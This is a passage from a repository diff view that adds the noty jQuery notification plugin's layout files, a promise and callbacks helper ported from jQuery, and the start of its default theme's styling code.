width: '100%',
|
12 |
+
height: 'auto',
|
13 |
+
margin: 0,
|
14 |
+
padding: 0,
|
15 |
+
listStyleType: 'none',
|
16 |
+
zIndex: 9999999
|
17 |
+
});
|
18 |
+
}
|
19 |
+
},
|
20 |
+
parent: {
|
21 |
+
object: '<li />',
|
22 |
+
selector: 'li',
|
23 |
+
css: {}
|
24 |
+
},
|
25 |
+
css: {
|
26 |
+
display: 'none'
|
27 |
+
},
|
28 |
+
addClass: ''
|
29 |
+
};
|
30 |
+
|
31 |
+
})(jQuery);
|
settings/types/js/noty/layouts/top.js
ADDED
@@ -0,0 +1,34 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
;(function($) {
|
2 |
+
|
3 |
+
$.noty.layouts.top = {
|
4 |
+
name: 'top',
|
5 |
+
options: {},
|
6 |
+
container: {
|
7 |
+
object: '<ul id="noty_top_layout_container" />',
|
8 |
+
selector: 'ul#noty_top_layout_container',
|
9 |
+
style: function() {
|
10 |
+
$(this).css({
|
11 |
+
top: 0,
|
12 |
+
left: '5%',
|
13 |
+
position: 'fixed',
|
14 |
+
width: '90%',
|
15 |
+
height: 'auto',
|
16 |
+
margin: 0,
|
17 |
+
padding: 0,
|
18 |
+
listStyleType: 'none',
|
19 |
+
zIndex: 9999999
|
20 |
+
});
|
21 |
+
}
|
22 |
+
},
|
23 |
+
parent: {
|
24 |
+
object: '<li />',
|
25 |
+
selector: 'li',
|
26 |
+
css: {}
|
27 |
+
},
|
28 |
+
css: {
|
29 |
+
display: 'none'
|
30 |
+
},
|
31 |
+
addClass: ''
|
32 |
+
};
|
33 |
+
|
34 |
+
})(jQuery);
|
settings/types/js/noty/layouts/topCenter.js
ADDED
@@ -0,0 +1,41 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
;(function($) {
|
2 |
+
|
3 |
+
$.noty.layouts.topCenter = {
|
4 |
+
name: 'topCenter',
|
5 |
+
options: { // overrides options
|
6 |
+
|
7 |
+
},
|
8 |
+
container: {
|
9 |
+
object: '<ul id="noty_topCenter_layout_container" />',
|
10 |
+
selector: 'ul#noty_topCenter_layout_container',
|
11 |
+
style: function() {
|
12 |
+
$(this).css({
|
13 |
+
top: 20,
|
14 |
+
left: 0,
|
15 |
+
position: 'fixed',
|
16 |
+
width: '310px',
|
17 |
+
height: 'auto',
|
18 |
+
margin: 0,
|
19 |
+
padding: 0,
|
20 |
+
listStyleType: 'none',
|
21 |
+
zIndex: 10000000
|
22 |
+
});
|
23 |
+
|
24 |
+
$(this).css({
|
25 |
+
left: ($(window).width() - $(this).outerWidth()) / 2 + 'px'
|
26 |
+
});
|
27 |
+
}
|
28 |
+
},
|
29 |
+
parent: {
|
30 |
+
object: '<li />',
|
31 |
+
selector: 'li',
|
32 |
+
css: {}
|
33 |
+
},
|
34 |
+
css: {
|
35 |
+
display: 'none',
|
36 |
+
width: '310px'
|
37 |
+
},
|
38 |
+
addClass: ''
|
39 |
+
};
|
40 |
+
|
41 |
+
})(jQuery);
|
settings/types/js/noty/layouts/topLeft.js
ADDED
@@ -0,0 +1,43 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
;(function($) {
|
2 |
+
|
3 |
+
$.noty.layouts.topLeft = {
|
4 |
+
name: 'topLeft',
|
5 |
+
options: { // overrides options
|
6 |
+
|
7 |
+
},
|
8 |
+
container: {
|
9 |
+
object: '<ul id="noty_topLeft_layout_container" />',
|
10 |
+
selector: 'ul#noty_topLeft_layout_container',
|
11 |
+
style: function() {
|
12 |
+
$(this).css({
|
13 |
+
top: 20,
|
14 |
+
left: 20,
|
15 |
+
position: 'fixed',
|
16 |
+
width: '310px',
|
17 |
+
height: 'auto',
|
18 |
+
margin: 0,
|
19 |
+
padding: 0,
|
20 |
+
listStyleType: 'none',
|
21 |
+
zIndex: 10000000
|
22 |
+
});
|
23 |
+
|
24 |
+
if (window.innerWidth < 600) {
|
25 |
+
$(this).css({
|
26 |
+
left: 5
|
27 |
+
});
|
28 |
+
}
|
29 |
+
}
|
30 |
+
},
|
31 |
+
parent: {
|
32 |
+
object: '<li />',
|
33 |
+
selector: 'li',
|
34 |
+
css: {}
|
35 |
+
},
|
36 |
+
css: {
|
37 |
+
display: 'none',
|
38 |
+
width: '310px'
|
39 |
+
},
|
40 |
+
addClass: ''
|
41 |
+
};
|
42 |
+
|
43 |
+
})(jQuery);
|
settings/types/js/noty/layouts/topRight.js
ADDED
@@ -0,0 +1,43 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
;(function($) {
|
2 |
+
|
3 |
+
$.noty.layouts.topRight = {
|
4 |
+
name: 'topRight',
|
5 |
+
options: { // overrides options
|
6 |
+
|
7 |
+
},
|
8 |
+
container: {
|
9 |
+
object: '<ul id="noty_topRight_layout_container" />',
|
10 |
+
selector: 'ul#noty_topRight_layout_container',
|
11 |
+
style: function() {
|
12 |
+
$(this).css({
|
13 |
+
top: 20,
|
14 |
+
right: 20,
|
15 |
+
position: 'fixed',
|
16 |
+
width: '310px',
|
17 |
+
height: 'auto',
|
18 |
+
margin: 0,
|
19 |
+
padding: 0,
|
20 |
+
listStyleType: 'none',
|
21 |
+
zIndex: 10000000
|
22 |
+
});
|
23 |
+
|
24 |
+
if (window.innerWidth < 600) {
|
25 |
+
$(this).css({
|
26 |
+
right: 5
|
27 |
+
});
|
28 |
+
}
|
29 |
+
}
|
30 |
+
},
|
31 |
+
parent: {
|
32 |
+
object: '<li />',
|
33 |
+
selector: 'li',
|
34 |
+
css: {}
|
35 |
+
},
|
36 |
+
css: {
|
37 |
+
display: 'none',
|
38 |
+
width: '310px'
|
39 |
+
},
|
40 |
+
addClass: ''
|
41 |
+
};
|
42 |
+
|
43 |
+
})(jQuery);
|
settings/types/js/noty/promise.js
ADDED
@@ -0,0 +1,432 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*!
|
2 |
+
* Noty Helpers Javascript From JQuery Javascript Library
|
3 |
+
*
|
4 |
+
* Ported by Maksim Pecherskiy. Original Licensing:
|
5 |
+
*
|
6 |
+
* http://jquery.com/
|
7 |
+
*
|
8 |
+
* Copyright 2011, John Resig
|
9 |
+
* Dual licensed under the MIT or GPL Version 2 licenses.
|
10 |
+
* http://jquery.org/license
|
11 |
+
*
|
12 |
+
* Includes Sizzle.js
|
13 |
+
* http://sizzlejs.com/
|
14 |
+
* Copyright 2011, The Dojo Foundation
|
15 |
+
* Released under the MIT, BSD, and GPL Licenses.
|
16 |
+
*
|
17 |
+
* Date: Mon Nov 21 21:11:03 2011 -0500
|
18 |
+
*/
|
19 |
+
|
20 |
+
|
21 |
+
(function(){
|
22 |
+
|
23 |
+
// String to Object flags format cache
|
24 |
+
var flagsCache = {};
|
25 |
+
|
26 |
+
// Convert String-formatted flags into Object-formatted ones and store in cache
|
27 |
+
function createFlags( flags ) {
|
28 |
+
var object = flagsCache[ flags ] = {},
|
29 |
+
i, length;
|
30 |
+
flags = flags.split( /\s+/ );
|
31 |
+
for ( i = 0, length = flags.length; i < length; i++ ) {
|
32 |
+
object[ flags[i] ] = true;
|
33 |
+
}
|
34 |
+
return object;
|
35 |
+
}
|
36 |
+
|
37 |
+
jQuery.extend({
|
38 |
+
|
39 |
+
_mark: function( elem, type ) {
|
40 |
+
if ( elem ) {
|
41 |
+
type = (type || "fx") + "mark";
|
42 |
+
jQuery.data( elem, type, (jQuery.data(elem,type,undefined,true) || 0) + 1, true );
|
43 |
+
}
|
44 |
+
},
|
45 |
+
|
46 |
+
_unmark: function( force, elem, type ) {
|
47 |
+
if ( force !== true ) {
|
48 |
+
type = elem;
|
49 |
+
elem = force;
|
50 |
+
force = false;
|
51 |
+
}
|
52 |
+
if ( elem ) {
|
53 |
+
type = type || "fx";
|
54 |
+
var key = type + "mark",
|
55 |
+
count = force ? 0 : ( (jQuery.data( elem, key, undefined, true) || 1 ) - 1 );
|
56 |
+
if ( count ) {
|
57 |
+
jQuery.data( elem, key, count, true );
|
58 |
+
} else {
|
59 |
+
jQuery.removeData( elem, key, true );
|
60 |
+
handleQueueMarkDefer( elem, type, "mark" );
|
61 |
+
}
|
62 |
+
}
|
63 |
+
},
|
64 |
+
|
65 |
+
queue: function( elem, type, data ) {
|
66 |
+
if ( elem ) {
|
67 |
+
type = (type || "fx") + "queue";
|
68 |
+
var q = jQuery.data( elem, type, undefined, true );
|
69 |
+
// Speed up dequeue by getting out quickly if this is just a lookup
|
70 |
+
if ( data ) {
|
71 |
+
if ( !q || jQuery.isArray(data) ) {
|
72 |
+
q = jQuery.data( elem, type, jQuery.makeArray(data), true );
|
73 |
+
} else {
|
74 |
+
q.push( data );
|
75 |
+
}
|
76 |
+
}
|
77 |
+
return q || [];
|
78 |
+
}
|
79 |
+
},
|
80 |
+
|
81 |
+
dequeue: function( elem, type ) {
|
82 |
+
type = type || "fx";
|
83 |
+
|
84 |
+
var queue = jQuery.queue( elem, type ),
|
85 |
+
fn = queue.shift(),
|
86 |
+
defer;
|
87 |
+
|
88 |
+
// If the fx queue is dequeued, always remove the progress sentinel
|
89 |
+
if ( fn === "inprogress" ) {
|
90 |
+
fn = queue.shift();
|
91 |
+
}
|
92 |
+
|
93 |
+
if ( fn ) {
|
94 |
+
// Add a progress sentinel to prevent the fx queue from being
|
95 |
+
// automatically dequeued
|
96 |
+
if ( type === "fx" ) {
|
97 |
+
queue.unshift("inprogress");
|
98 |
+
}
|
99 |
+
|
100 |
+
fn.call(elem, function() {
|
101 |
+
jQuery.dequeue(elem, type);
|
102 |
+
});
|
103 |
+
}
|
104 |
+
|
105 |
+
if ( !queue.length ) {
|
106 |
+
jQuery.removeData( elem, type + "queue", true );
|
107 |
+
handleQueueMarkDefer( elem, type, "queue" );
|
108 |
+
}
|
109 |
+
}
|
110 |
+
});
|
111 |
+
|
112 |
+
jQuery.fn.extend({
|
113 |
+
queue: function( type, data ) {
|
114 |
+
if ( typeof type !== "string" ) {
|
115 |
+
data = type;
|
116 |
+
type = "fx";
|
117 |
+
}
|
118 |
+
|
119 |
+
if ( data === undefined ) {
|
120 |
+
return jQuery.queue( this[0], type );
|
121 |
+
}
|
122 |
+
return this.each(function() {
|
123 |
+
var queue = jQuery.queue( this, type, data );
|
124 |
+
|
125 |
+
if ( type === "fx" && queue[0] !== "inprogress" ) {
|
126 |
+
jQuery.dequeue( this, type );
|
127 |
+
}
|
128 |
+
});
|
129 |
+
},
|
130 |
+
dequeue: function( type ) {
|
131 |
+
return this.each(function() {
|
132 |
+
jQuery.dequeue( this, type );
|
133 |
+
});
|
134 |
+
},
|
135 |
+
// Based off of the plugin by Clint Helfers, with permission.
|
136 |
+
// http://blindsignals.com/index.php/2009/07/jquery-delay/
|
137 |
+
delay: function( time, type ) {
|
138 |
+
time = jQuery.fx ? jQuery.fx.speeds[time] || time : time;
|
139 |
+
type = type || "fx";
|
140 |
+
|
141 |
+
return this.queue( type, function() {
|
142 |
+
var elem = this;
|
143 |
+
setTimeout(function() {
|
144 |
+
jQuery.dequeue( elem, type );
|
145 |
+
}, time );
|
146 |
+
});
|
147 |
+
},
|
148 |
+
clearQueue: function( type ) {
|
149 |
+
return this.queue( type || "fx", [] );
|
150 |
+
},
|
151 |
+
// Get a promise resolved when queues of a certain type
|
152 |
+
// are emptied (fx is the type by default)
|
153 |
+
promise: function( type, object ) {
|
154 |
+
if ( typeof type !== "string" ) {
|
155 |
+
object = type;
|
156 |
+
type = undefined;
|
157 |
+
}
|
158 |
+
type = type || "fx";
|
159 |
+
var defer = jQuery.Deferred(),
|
160 |
+
elements = this,
|
161 |
+
i = elements.length,
|
162 |
+
count = 1,
|
163 |
+
deferDataKey = type + "defer",
|
164 |
+
queueDataKey = type + "queue",
|
165 |
+
markDataKey = type + "mark",
|
166 |
+
tmp;
|
167 |
+
function resolve() {
|
168 |
+
if ( !( --count ) ) {
|
169 |
+
defer.resolveWith( elements, [ elements ] );
|
170 |
+
}
|
171 |
+
}
|
172 |
+
while( i-- ) {
|
173 |
+
if (( tmp = jQuery.data( elements[ i ], deferDataKey, undefined, true ) ||
|
174 |
+
( jQuery.data( elements[ i ], queueDataKey, undefined, true ) ||
|
175 |
+
jQuery.data( elements[ i ], markDataKey, undefined, true ) ) &&
|
176 |
+
jQuery.data( elements[ i ], deferDataKey, jQuery._Deferred(), true ) )) {
|
177 |
+
count++;
|
178 |
+
tmp.done( resolve );
|
179 |
+
}
|
180 |
+
}
|
181 |
+
resolve();
|
182 |
+
return defer.promise();
|
183 |
+
}
|
184 |
+
});
|
185 |
+
|
186 |
+
function handleQueueMarkDefer( elem, type, src ) {
|
187 |
+
var deferDataKey = type + "defer",
|
188 |
+
queueDataKey = type + "queue",
|
189 |
+
markDataKey = type + "mark",
|
190 |
+
defer = jQuery._data( elem, deferDataKey );
|
191 |
+
if ( defer &&
|
192 |
+
( src === "queue" || !jQuery._data(elem, queueDataKey) ) &&
|
193 |
+
( src === "mark" || !jQuery._data(elem, markDataKey) ) ) {
|
194 |
+
// Give room for hard-coded callbacks to fire first
|
195 |
+
// and eventually mark/queue something else on the element
|
196 |
+
setTimeout( function() {
|
197 |
+
if ( !jQuery._data( elem, queueDataKey ) &&
|
198 |
+
!jQuery._data( elem, markDataKey ) ) {
|
199 |
+
jQuery.removeData( elem, deferDataKey, true );
|
200 |
+
defer.fire();
|
201 |
+
}
|
202 |
+
}, 0 );
|
203 |
+
}
|
204 |
+
}
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
jQuery.Callbacks = function( flags ) {
|
209 |
+
|
210 |
+
// Convert flags from String-formatted to Object-formatted
|
211 |
+
// (we check in cache first)
|
212 |
+
flags = flags ? ( /*flagsCache[ flags ] || */createFlags( flags ) ) : {};
|
213 |
+
|
214 |
+
var // Actual callback list
|
215 |
+
list = [],
|
216 |
+
// Stack of fire calls for repeatable lists
|
217 |
+
stack = [],
|
218 |
+
// Last fire value (for non-forgettable lists)
|
219 |
+
memory,
|
220 |
+
// Flag to know if list is currently firing
|
221 |
+
firing,
|
222 |
+
// First callback to fire (used internally by add and fireWith)
|
223 |
+
firingStart,
|
224 |
+
// End of the loop when firing
|
225 |
+
firingLength,
|
226 |
+
// Index of currently firing callback (modified by remove if needed)
|
227 |
+
firingIndex,
|
228 |
+
// Add one or several callbacks to the list
|
229 |
+
add = function( args ) {
|
230 |
+
var i,
|
231 |
+
length,
|
232 |
+
elem,
|
233 |
+
type,
|
234 |
+
actual;
|
235 |
+
for ( i = 0, length = args.length; i < length; i++ ) {
|
236 |
+
elem = args[ i ];
|
237 |
+
type = jQuery.type( elem );
|
238 |
+
if ( type === "array" ) {
|
239 |
+
// Inspect recursively
|
240 |
+
add( elem );
|
241 |
+
} else if ( type === "function" ) {
|
242 |
+
// Add if not in unique mode and callback is not in
|
243 |
+
if ( !flags.unique || !self.has( elem ) ) {
|
244 |
+
list.push( elem );
|
245 |
+
}
|
246 |
+
}
|
247 |
+
}
|
248 |
+
},
|
249 |
+
// Fire callbacks
|
250 |
+
fire = function( context, args ) {
|
251 |
+
args = args || [];
|
252 |
+
memory = !flags.memory || [ context, args ];
|
253 |
+
firing = true;
|
254 |
+
firingIndex = firingStart || 0;
|
255 |
+
firingStart = 0;
|
256 |
+
firingLength = list.length;
|
257 |
+
for ( ; list && firingIndex < firingLength; firingIndex++ ) {
|
258 |
+
if ( list[ firingIndex ].apply( context, args ) === false && flags.stopOnFalse ) {
|
259 |
+
memory = true; // Mark as halted
|
260 |
+
break;
|
261 |
+
}
|
262 |
+
}
|
263 |
+
firing = false;
|
264 |
+
if ( list ) {
|
265 |
+
if ( !flags.once ) {
|
266 |
+
if ( stack && stack.length ) {
|
267 |
+
memory = stack.shift();
|
268 |
+
self.fireWith( memory[ 0 ], memory[ 1 ] );
|
269 |
+
}
|
270 |
+
} else if ( memory === true ) {
|
271 |
+
self.disable();
|
272 |
+
} else {
|
273 |
+
list = [];
|
274 |
+
}
|
275 |
+
}
|
276 |
+
},
|
277 |
+
// Actual Callbacks object
|
278 |
+
self = {
|
279 |
+
// Add a callback or a collection of callbacks to the list
|
280 |
+
add: function() {
|
281 |
+
if ( list ) {
|
282 |
+
var length = list.length;
|
283 |
+
add( arguments );
|
284 |
+
// Do we need to add the callbacks to the
|
285 |
+
// current firing batch?
|
286 |
+
if ( firing ) {
|
287 |
+
firingLength = list.length;
|
288 |
+
// With memory, if we're not firing then
|
289 |
+
// we should call right away, unless previous
|
290 |
+
// firing was halted (stopOnFalse)
|
291 |
+
} else if ( memory && memory !== true ) {
|
292 |
+
firingStart = length;
|
293 |
+
fire( memory[ 0 ], memory[ 1 ] );
|
294 |
+
}
|
295 |
+
}
|
296 |
+
return this;
|
297 |
+
},
|
298 |
+
// Remove a callback from the list
|
299 |
+
remove: function() {
|
300 |
+
if ( list ) {
|
301 |
+
var args = arguments,
|
302 |
+
argIndex = 0,
|
303 |
+
argLength = args.length;
|
304 |
+
for ( ; argIndex < argLength ; argIndex++ ) {
|
305 |
+
for ( var i = 0; i < list.length; i++ ) {
|
306 |
+
if ( args[ argIndex ] === list[ i ] ) {
|
307 |
+
// Handle firingIndex and firingLength
|
308 |
+
if ( firing ) {
|
309 |
+
if ( i <= firingLength ) {
|
310 |
+
firingLength--;
|
311 |
+
if ( i <= firingIndex ) {
|
312 |
+
firingIndex--;
|
313 |
+
}
|
314 |
+
}
|
315 |
+
}
|
316 |
+
// Remove the element
|
317 |
+
list.splice( i--, 1 );
|
318 |
+
// If we have some unicity property then
|
319 |
+
// we only need to do this once
|
320 |
+
if ( flags.unique ) {
|
321 |
+
break;
|
322 |
+
}
|
323 |
+
}
|
324 |
+
}
|
325 |
+
}
|
326 |
+
}
|
327 |
+
return this;
|
328 |
+
},
|
329 |
+
// Control if a given callback is in the list
|
330 |
+
has: function( fn ) {
|
331 |
+
if ( list ) {
|
332 |
+
var i = 0,
|
333 |
+
length = list.length;
|
334 |
+
for ( ; i < length; i++ ) {
|
335 |
+
if ( fn === list[ i ] ) {
|
336 |
+
return true;
|
337 |
+
}
|
338 |
+
}
|
339 |
+
}
|
340 |
+
return false;
|
341 |
+
},
|
342 |
+
// Remove all callbacks from the list
|
343 |
+
empty: function() {
|
344 |
+
list = [];
|
345 |
+
return this;
|
346 |
+
},
|
347 |
+
// Have the list do nothing anymore
|
348 |
+
disable: function() {
|
349 |
+
list = stack = memory = undefined;
|
350 |
+
return this;
|
351 |
+
},
|
352 |
+
// Is it disabled?
|
353 |
+
disabled: function() {
|
354 |
+
return !list;
|
355 |
+
},
|
356 |
+
// Lock the list in its current state
|
357 |
+
lock: function() {
|
358 |
+
stack = undefined;
|
359 |
+
if ( !memory || memory === true ) {
|
360 |
+
self.disable();
|
361 |
+
}
|
362 |
+
return this;
|
363 |
+
},
|
364 |
+
// Is it locked?
|
365 |
+
locked: function() {
|
366 |
+
return !stack;
|
367 |
+
},
|
368 |
+
// Call all callbacks with the given context and arguments
|
369 |
+
fireWith: function( context, args ) {
|
370 |
+
if ( stack ) {
|
371 |
+
if ( firing ) {
|
372 |
+
if ( !flags.once ) {
|
373 |
+
stack.push( [ context, args ] );
|
374 |
+
}
|
375 |
+
} else if ( !( flags.once && memory ) ) {
|
376 |
+
fire( context, args );
|
377 |
+
}
|
378 |
+
}
|
379 |
+
return this;
|
380 |
+
},
|
381 |
+
// Call all the callbacks with the given arguments
|
382 |
+
fire: function() {
|
383 |
+
self.fireWith( this, arguments );
|
384 |
+
return this;
|
385 |
+
},
|
386 |
+
// To know if the callbacks have already been called at least once
|
387 |
+
fired: function() {
|
388 |
+
return !!memory;
|
389 |
+
}
|
390 |
+
};
|
391 |
+
|
392 |
+
return self;
|
393 |
+
};
|
394 |
+
|
395 |
+
|
396 |
+
|
397 |
+
jQuery.fn.extend({
|
398 |
+
// Get a promise resolved when queues of a certain type
|
399 |
+
// are emptied (fx is the type by default)
|
400 |
+
promise: function( type, object ) {
|
401 |
+
if ( typeof type !== "string" ) {
|
402 |
+
object = type;
|
403 |
+
type = undefined;
|
404 |
+
}
|
405 |
+
type = type || "fx";
|
406 |
+
var defer = jQuery.Deferred(),
|
407 |
+
elements = this,
|
408 |
+
i = elements.length,
|
409 |
+
count = 1,
|
410 |
+
deferDataKey = type + "defer",
|
411 |
+
queueDataKey = type + "queue",
|
412 |
+
markDataKey = type + "mark",
|
413 |
+
tmp;
|
414 |
+
function resolve() {
|
415 |
+
if ( !( --count ) ) {
|
416 |
+
defer.resolveWith( elements, [ elements ] );
|
417 |
+
}
|
418 |
+
}
|
419 |
+
while( i-- ) {
|
420 |
+
if (( tmp = jQuery.data( elements[ i ], deferDataKey, undefined, true ) ||
|
421 |
+
( jQuery.data( elements[ i ], queueDataKey, undefined, true ) ||
|
422 |
+
jQuery.data( elements[ i ], markDataKey, undefined, true ) ) &&
|
423 |
+
jQuery.data( elements[ i ], deferDataKey, jQuery.Callbacks( "once memory" ), true ) )) {
|
424 |
+
count++;
|
425 |
+
tmp.add( resolve );
|
426 |
+
}
|
427 |
+
}
|
428 |
+
resolve();
|
429 |
+
return defer.promise();
|
430 |
+
}
|
431 |
+
});
|
432 |
+
})();
|
settings/types/js/noty/themes/default.js
ADDED
@@ -0,0 +1,156 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
;(function($) {
|
2 |
+
|
3 |
+
$.noty.themes.defaultTheme = {
|
4 |
+
name: 'defaultTheme',
|
5 |
+
helpers: {
|
6 |
+
borderFix: function() {
|
7 |
+
if (this.options.dismissQueue) {
|
8 |
+
var selector = this.options.layout.container.selector + ' ' + this.options.layout.parent.selector;
|
9 |
+
switch (this.options.layout.name) {
|
10 |
+
case 'top':
|
11 |
+
$(selector).css({borderRadius: '0px 0px 0px 0px'});
|
12 |
+
$(selector).last().css({borderRadius: '0px 0px 5px 5px'}); break;
|
13 |
+
case 'topCenter': case 'topLeft': case 'topRight':
|
14 |
+
case 'bottomCenter': case 'bottomLeft': case 'bottomRight':
|
15 |
+
case 'center': case 'centerLeft': case 'centerRight': case 'inline':
|
16 |
+
$(selector).css({borderRadius: '0px 0px 0px 0px'});
|
17 |
+
$(selector).first().css({'border-top-left-radius': '5px', 'border-top-right-radius': '5px'});
|
18 |
+
$(selector).last().css({'border-bottom-left-radius': '5px', 'border-bottom-right-radius': '5px'}); break;
|
19 |
+
case 'bottom':
|
20 |
+
$(selector).css({borderRadius: '0px 0px 0px 0px'});
|
21 |
+
$(selector).first().css({borderRadius: '5px 5px 0px 0px'}); break;
|
22 |
+
default: break;
|
23 |
+
}
|
24 |
+
}
|
25 |
+
}
|
26 |
+
},
|
27 |
+
modal: {
|
28 |
+
css: {
|
29 |
+
position: 'fixed',
|
30 |
+
width: '100%',
|
31 |
+
height: '100%',
|
32 |
+
backgroundColor: '#000',
|
33 |
+
zIndex: 10000,
|
34 |
+
opacity: 0.6,
|
35 |
+
display: 'none',
|
36 |
+
left: 0,
|
37 |
+
top: 0
|
38 |
+
}
|
39 |
+
},
|
40 |
+
style: function() {
|
41 |
+
|
42 |
+
this.$bar.css({
|
43 |
+
overflow: 'hidden',
|
44 |
+
background: "url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABsAAAAoCAYAAAAPOoFWAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAPZJREFUeNq81tsOgjAMANB2ov7/7ypaN7IlIwi9rGuT8QSc9EIDAsAznxvY4pXPKr05RUE5MEVB+TyWfCEl9LZApYopCmo9C4FKSMtYoI8Bwv79aQJU4l6hXXCZrQbokJEksxHo9KMOgc6w1atHXM8K9DVC7FQnJ0i8iK3QooGgbnyKgMDygBWyYFZoqx4qS27KqLZJjA1D0jK6QJcYEQEiWv9PGkTsbqxQ8oT+ZtZB6AkdsJnQDnMoHXHLGKOgDYuCWmYhEERCI5gaamW0bnHdA3k2ltlIN+2qKRyCND0bhqSYCyTB3CAOc4WusBEIpkeBuPgJMAAX8Hs1NfqHRgAAAABJRU5ErkJggg==') repeat-x scroll left top #fff"
|
45 |
+
});
|
46 |
+
|
47 |
+
this.$message.css({
|
48 |
+
